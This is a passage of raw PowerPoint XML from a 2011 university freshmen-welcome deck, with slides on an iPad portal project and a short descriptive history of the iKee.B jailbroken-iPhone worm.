              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217106591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0025"/>
            <a:ext cx="8382000" cy="978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UCCSClassApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Towards A better CMS for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iPad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Client and Smart Mobile Devices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366712" y="1154113"/>
            <a:ext cx="8410575" cy="2686889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Project goal: develop an easy to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ipad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> app and portal. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Investigate how to harden a portal (studentfootprint.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Involve a company called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>niVolve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Portal being developed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Inivolve’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>PortalFramework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Zend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> Guard to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encode/obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t> scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>against unlicensed use and reverse engineering.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Greg to perform penetration testing when it is ready!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Appcelerator.com’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> Titanium for cross-platform development. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</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9100" y="1193799"/>
            <a:ext cx="2054243" cy="91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899" y="3365500"/>
            <a:ext cx="6852145" cy="33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C:\Users\cchow\Pictures\gnomeTrademar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6343" y="4626642"/>
            <a:ext cx="1205211" cy="139541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996121" y="3389313"/>
            <a:ext cx="2374900" cy="1034129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is wrong with the above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>studentfootprint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> logo? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65799218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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="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Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="495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Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="457200"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>An analysis of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iKee.B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> (duh)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27653" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1066800"/>
            <a:ext cx="7086600" cy="5761577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>In early November 2009, Dutch users of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> iPhones in T-Mobile's 3G IP range began experiencing extortion popup windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> iPhones have been configured with a secure shell (SSH) network service with a known default root password of 'alpine'.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>around the week of 8 November, a second iPhone malware outbreak began in Australia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>convert the iPhone into a self-propagating worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It succeeded in infecting an estimated 21,000 victims within about a week</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Ashley Towns was subsequently offered a job by a leading Australian Software company, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Mogeneration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11/18/2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Two weeks later new malware version with integrated http based C&amp;C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from Lithuanian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>botnet master</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="276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248400"/>
            <a:ext cx="86868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3988" y="4495800"/>
            <a:ext cx="13700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10" descr="4105473594_fc65efec5b_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685800"/>
            <a:ext cx="2082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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6172200"/>
            <a:ext cx="9144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i="0"/>
              <a:t>Ehab Ashary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0"/>
              <a:t>CS691-Summer 2011 University of Colorado, Colorado Springs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27655" name="Picture 7" descr="bad-app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0088" y="3720306"/>
            <a:ext cx="1447800" cy="1119187"/>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418262631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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="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Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
